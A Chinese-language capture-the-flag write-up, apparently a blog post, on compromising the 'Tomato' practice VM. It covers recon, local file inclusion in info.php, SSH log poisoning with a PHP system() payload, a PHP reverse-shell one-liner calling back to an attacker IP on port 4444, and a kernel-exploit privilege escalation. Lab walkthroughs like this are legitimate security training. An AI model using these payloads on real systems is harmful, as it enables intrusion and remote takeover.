tomato靶机提权

信息收集

1、 使用arp-scan -l 扫描本地局域网存活主机:
在这里插入图片描述

2、 Nmap扫描开放端口以及相关信息:
在这里插入图片描述

3、 访问http服务端口查看页面信息:
在这里插入图片描述

4、 没有相关可利用信息,继续访问8888端口http服务:
在这里插入图片描述

5、 利用dirb对站点目录进行爆破:
在这里插入图片描述

6、 发现其他站点并进行访问
在这里插入图片描述

7、 根据修改时间发现info.php文件最新更新,访问并查看源码:
在这里插入图片描述

发现文件包含,尝试包含文件…/…/…/…/…/…/etc/passwd:
在这里插入图片描述

利用漏洞

已知info.php文件存在文件包含漏洞,以及开放ssh端口,尝试包含ssh认证日志文件/var/log/auth.log,并利用ssh认证用户名实现命令注入:
1、 尝试用tomato作为用户名进行失败登录,观察相关日志记录:
在这里插入图片描述

2、 利用<?php system($_GET[‘cmd’]);?>作为用户名进行php代码注入:
在这里插入图片描述

3、 验证php是否注入成功
访问?image=…/…/…/…/…/…/var/log/auth.log&cmd=ls并查看网页源代码:
在这里插入图片描述

4、 尝试get shall,利用php反弹shell,kali攻击机利用nc监听4444端口:
在这里插入图片描述

PHP反弹shell代码如下:
php -r ‘$sock=fsockopen(“192.168.1.53”,4444);exec("/bin/sh -i <&3 >&3 2>&3");’
进行url编码后得到:
php±r+%27%24sock%3dfsockopen(%22192.168.1. 53%22%2c4444)%3bexec(%22%2fbin%2fsh±i+%3c%263+%3e%263+2%3e%263%22)%3b%27
在这里插入图片描述

权限提升

1、 利用python打开终端查看内核版本
在这里插入图片描述

2、 下载对应版本的exp
在这里插入图片描述

git clone https://github.com/kkamagui/linux-kernel-exploits.git
然后运行compile.sh 编译c文件
在这里插入图片描述

3、 上传至目标主机
python -m SimpleHTTPServer 8000
在这里插入图片描述

上传文件至目标机
在这里插入图片描述
在这里插入图片描述

上传成功
在这里插入图片描述
在这里插入图片描述

提权成功

  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值